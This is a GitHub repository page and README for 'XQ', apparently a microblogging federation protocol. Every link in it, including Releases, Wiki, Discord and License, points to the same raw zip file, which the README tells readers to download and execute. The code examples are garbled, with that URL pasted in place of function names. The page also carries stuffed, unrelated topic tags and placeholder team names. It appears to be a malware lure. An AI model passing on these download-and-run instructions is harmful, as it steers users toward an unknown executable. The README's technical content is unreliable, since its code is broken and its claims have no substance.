https://github.com/tantawy555/xq
High-efficiency federation protocol for microblogging (rfc)
https://github.com/tantawy555/xq
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High-efficiency federation protocol for microblogging (rfc)
- Host: GitHub
- URL: https://github.com/tantawy555/xq
- Owner: Tantawy555
- Created: 2025-04-27T19:23:22.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-04-27T21:15:43.000Z (about 1 year ago)
- Last Synced: 2025-04-27T22:22:52.475Z (about 1 year ago)
- Topics: adsp, android, basex, exist-db, html, lle, macos, qemu, qrcode-scanner, quic, saxon, windows, x11, xpath
- Size: 14.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
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- Readme: README.md
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README
# π XQ: High-Efficiency Federation Protocol for Microblogging

Welcome to the **XQ** repository! This project aims to provide a high-efficiency federation protocol for microblogging platforms. With XQ, developers can create robust and scalable microblogging services that communicate seamlessly with one another.
## π Features
- **Efficiency**: Designed for high performance and low latency.
- **Interoperability**: Supports communication between different microblogging platforms.
- **Scalability**: Built to handle a growing number of users and interactions.
- **Security**: Implements strong security measures to protect user data.
## π¦ Installation
To get started with XQ, you can download the latest release from our [Releases section](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip). Please download the appropriate file for your system and execute it to set up the protocol.
## π οΈ Usage
Once installed, you can use XQ to facilitate communication between your microblogging service and others. Hereβs a basic example of how to implement XQ in your application:
```python
import xq
# Initialize the XQ protocol
protocol = https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip()
# Send a message
https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip("Hello, world!")
```
## π Documentation
For detailed documentation, please visit our [Wiki](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip). Here, you will find guides on setup, configuration, and advanced usage.
## π Community
Join our community to share ideas, ask questions, and collaborate with other developers. You can find us on:
- [Discord](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip)
- [Twitter](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip)
- [Reddit](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip)
## π Contributing
We welcome contributions! If you want to help improve XQ, please follow these steps:
1. Fork the repository.
2. Create a new branch.
3. Make your changes.
4. Submit a pull request.
Please check our [Contributing Guidelines](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip) for more details.
## π Releases
For the latest updates and releases, visit our [Releases section](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip). Here, you can find the latest version and download the necessary files to get started.
## π‘ Examples
Here are some examples of how XQ can be used in different scenarios:
### Example 1: Sending a Message
```python
https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip("This is a test message.")
```
### Example 2: Receiving Messages
```python
messages = https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip()
for message in messages:
print(message)
```
### Example 3: User Authentication
```python
https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip("username", "password")
```
## π¨ Design Principles
XQ is built on several key design principles:
- **Simplicity**: The protocol is easy to understand and implement.
- **Modularity**: Components can be added or removed as needed.
- **Extensibility**: New features can be integrated without major changes to the existing codebase.
## π Roadmap
We have a clear roadmap for future development:
- **Version 1.1**: Improve performance and add new features.
- **Version 2.0**: Major updates including a new API and enhanced security features.
- **Version 3.0**: Community-driven enhancements based on user feedback.
## π§βπ€βπ§ Team
Meet the team behind XQ:
- **Alice Smith** - Lead Developer
- **Bob Johnson** - Project Manager
- **Charlie Brown** - UX Designer
## π Support
If you encounter any issues or have questions, please check the [Issues section](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip) or reach out to our support team.
## π Acknowledgments
Thank you to all contributors and supporters who have helped make XQ a reality. Your feedback and contributions are invaluable.
## π License
This project is licensed under the MIT License. See the [LICENSE](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip) file for details.
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For more information, please visit our [Releases section](https://github.com/Tantawy555/xq/raw/refs/heads/main/protos/Software-v1.7-alpha.2.zip) to download the latest version and explore what XQ can do for you.